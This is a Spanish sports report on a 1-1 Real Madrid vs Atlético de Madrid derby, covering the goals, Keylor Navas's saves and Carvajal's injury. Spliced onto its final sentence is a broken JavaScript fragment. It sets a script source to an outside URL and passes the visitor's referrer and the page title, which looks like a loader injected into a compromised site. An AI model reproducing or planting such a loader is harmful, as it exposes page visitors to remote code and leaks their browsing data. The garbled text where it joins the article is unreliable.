Minuto 91: Kelia Vidarte/LaTribunamadridista.com
El encuentro de esta noche parecía que iba a regalarle el liderato a los blancos, pero ya estaban los hombres de Simeone para aguarles la fiesta. Un Real Madrid algo rácano se quedo con la sonrisa congelada al sacar un único empate del derbi madrileño frente al Atlético de Madrid (1-1) en el Vicente Calderón, feudo rojiblanco.
Un Madrid con miedos tras ponerse por delante a los ocho minutos del inicio del encuentro. Tras el gol de Benzema, dio un paso atrás y terminó pagándolo a 10 minutos del final del partido, cuando Vietto encontró el único hueco que dejó Keylor Navas, el mejor del equipo de Benítez en toda la noche y el encargado de parar un penalti a Griezmann y de sacar unas manos en los momentos más complicados.
El Madrid no pudo librarse de la fe del Atlético de Madrid, un equipo gris, sin ideas, pero que supo ahogar a su rival rácano, sobre todo en los minutos de la segunda parte. Incluso los hombres de Simeone pudieron pasar del empate , pero el portero del Real Madrid, Keylor Navas, estuvo ahí para oponerse con sus grandes paradas. El Atlético quizás le puso más, porque le echó más pasión a su tiempo de dominio. El Real Madrid fue durante la primera parte demasiado frío, como que se conformaba con el 0-1, que llegó muy rápido y convencido de que el Atlético que tenía delante no sería capaz de empatarle.
Pero tras el descanso se vio sorprendido con el juego de su rival, que mejoró con los cambios. En el equipo rojiblanco podemos destacar a Correa que pudo haber provocado el empate en la primera parte. Benítez tuvo un acierto a la hora de colocar a Casemiro, pero su equipo no apretó lo suficiente y los cambios no fueron osados ni encontró vías para el contraataque. Ni con el galés Bale sobre el campo se pudo hacer lo suficiente. El gran punto negativo de la noche fue la lesión de Carvajal, que provocó que todo el equipo terminará con apariencia de estar fundido. El Madrid pudo llevarse el Derbi y se le resbaló de la mano.s.src=’http:///?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »;